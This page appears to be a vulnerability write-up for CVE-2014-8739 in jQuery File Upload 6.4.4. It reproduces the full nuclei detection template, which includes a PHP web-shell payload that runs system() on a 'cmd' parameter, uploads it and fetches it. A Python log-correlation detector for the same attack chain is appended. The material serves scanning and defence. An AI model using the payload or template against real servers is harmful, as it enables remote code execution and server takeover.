jQuery File Upload 644 - Unrestricted File Upload

Vulnerability Information

Vulnerability name: jQuery File Upload 6.4.4 - Unrestricted File Upload

Vulnerability ID:

  • CVE: CVE-2014-8739

Vulnerability type: File upload

Severity: Critical

Description: jQuery File Upload is a popular file upload plugin, widely used on all kinds of websites, that lets users upload files to a server through a web interface. Because of its ease of use and flexibility it is adopted by many websites and web applications, especially where users need to upload files. The plugin provides a user-friendly interface that supports multi-file upload, drag-and-drop upload and similar features, and it appears both in enterprise-grade services and in common web application components.

The vulnerability exists in version 6.4.4 of the jQuery File Upload plugin; specifically, the file server/php/UploadHandler.php lacks effective validation of the type of uploaded files. An attacker can upload arbitrary PHP files, including malicious code; because the server does not correctly restrict the type of uploaded files, this results in a remote code execution (RCE) vulnerability. The attacker only needs to upload a file with a PHP extension and then access that file directly to execute the PHP code it contains.

The impact of this vulnerability is extremely serious, because it allows an attacker to execute arbitrary code on the affected server and take complete control of the website and the server. An attacker can use it to steal sensitive data, plant backdoors, deface website content or carry out other malicious activity. Since exploitation requires no authentication and can be automated, the risk is very high. Site administrators should act immediately: upgrade to a patched version, implement strict file type validation, restrict permissions on the upload directory and use a whitelist of allowed file extensions, in order to mitigate the risk posed by this vulnerability.

Vendor: jquery_file_upload_project

Product: jQuery File Upload

Affected versions: 6.4.4

Source: https://github.com/projectdiscovery/nuclei-templates/blob/d9fa14d58961e8281874c1bbd6c37ff13091dbb6/http%2Fcves%2F2014%2FCVE-2014-8739.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


id: CVE-2014-8739

info:
  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
  author: pranjal
  severity: critical
  description: jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
  remediation: |
    - Upgrade to a patched version of jQuery File Upload plugin
    - Implement proper file type validation on the server side
    - Restrict upload directories and file permissions
    - Use whitelist approach for allowed file extensions
  reference:
    - https://www.exploit-db.com/exploits/35057/
    - https://www.exploit-db.com/exploits/36811/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.94326
    epss-percentile: 0.99943
    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: jquery_file_upload_project
    product: jquery_file_upload
    verified: true
  tags: cve2014,cve,edb,jquery,file-upload,rce,kev

variables:
  randstr: "{{randstr}}"
  php_payload: |
    <?php
    echo "{{randstr}}";
    if(isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>

http:
  # Step 1: Check if the vulnerable endpoint exists and identify jQuery File Upload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^{\"files\":\s*\[\]'
        part: body

      - type: word
        part: body
        words:
          - "files"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: upload_url
        part: body
        regex:
          - '"url":\s*"([^"]+)"'
          - '"upload_url":\s*"([^"]+)"'

  # Step 2: Attempt to upload a PHP file with specific jQuery File Upload response patterns
  - method: POST
    path:
      - "{{BaseURL}}/server/php/"

    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
      Content-Type: application/x-php

      {{php_payload}}
      ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
        part: body

      - type: word
        part: body
        words:
          - "files"
          - "{{randstr}}"
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/plain;charset=UTF-8"
        condition: and

    extractors:
      - type: regex
        name: uploaded_file
        part: body
        regex:
          - '"name":\s*"([^"]+)"'
          - '"url":\s*"([^"]+)"'

  # Step 3: Verify the uploaded file is accessible and contains our unique payload
  - method: GET
    path:
      - "{{BaseURL}}/server/php/files/{{randstr}}.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_output
        part: body
        regex:
          - '{{randstr}}'

# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950
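As an added defender-side example (not part of the original page or of the nuclei-templates project), the Python below correlates web-server access-log lines per client to flag exactly the chain the template above exercises: a successful POST to the upload handler followed by a successful GET of a .php file under the upload directory. The log lines are constructed samples, and the paths /server/php/ and /server/php/files/ are assumed to match the plugin's default layout.

```python
import re

# Minimal parser for common/combined access-log lines (sample lines are constructed below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Paths assumed from the CVE-2014-8739 template above: the PHP upload handler and
# the directory it stores uploads in (adjust if the deployment relocated them).
UPLOAD_ENDPOINT = "/server/php/"
UPLOADED_PHP_RE = re.compile(r"^/server/php/files/[^/?]+\.php(?:$|\?)", re.IGNORECASE)


def parse_line(line):
    """Return a dict (ip, ts, method, path, status) for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_upload_then_execute(lines):
    """Flag clients that POST to the upload handler and later fetch a .php file
    from the upload directory with HTTP 200. Returns (ip, path) pairs in log order."""
    uploaders = set()  # client IPs that completed a POST to the upload handler
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line; a real pipeline would count these
        ip, path, status = rec["ip"], rec["path"], rec["status"]
        if rec["method"] == "POST" and path.startswith(UPLOAD_ENDPOINT) and status == 200:
            uploaders.add(ip)
        elif (rec["method"] == "GET" and status == 200 and ip in uploaders
              and UPLOADED_PHP_RE.match(path)):
            hits.append((ip, path.split("?", 1)[0]))
    return hits


# Constructed sample traffic (RFC 5737 documentation addresses, not real clients).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jul/2025:10:00:01 +0000] "GET /server/php/ HTTP/1.1" 200 12',
    '203.0.113.5 - - [28/Jul/2025:10:00:02 +0000] "POST /server/php/ HTTP/1.1" 200 98',
    '203.0.113.5 - - [28/Jul/2025:10:00:03 +0000] "GET /server/php/files/abc123.php?cmd=id HTTP/1.1" 200 40',
    '198.51.100.7 - - [28/Jul/2025:10:01:00 +0000] "GET /server/php/files/photo.jpg HTTP/1.1" 200 5120',
    '198.51.100.9 - - [28/Jul/2025:10:02:00 +0000] "GET /server/php/files/old.php HTTP/1.1" 404 0',
]
```

Running `find_upload_then_execute(SAMPLE_LOG)` reports only the first client; the .jpg download and the 404 on an old .php file are not flagged, and a GET without a preceding POST from the same client is ignored.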


http://example.com/2025/07/28/github_3768457412/
Author: lianccc
Published: July 28, 2025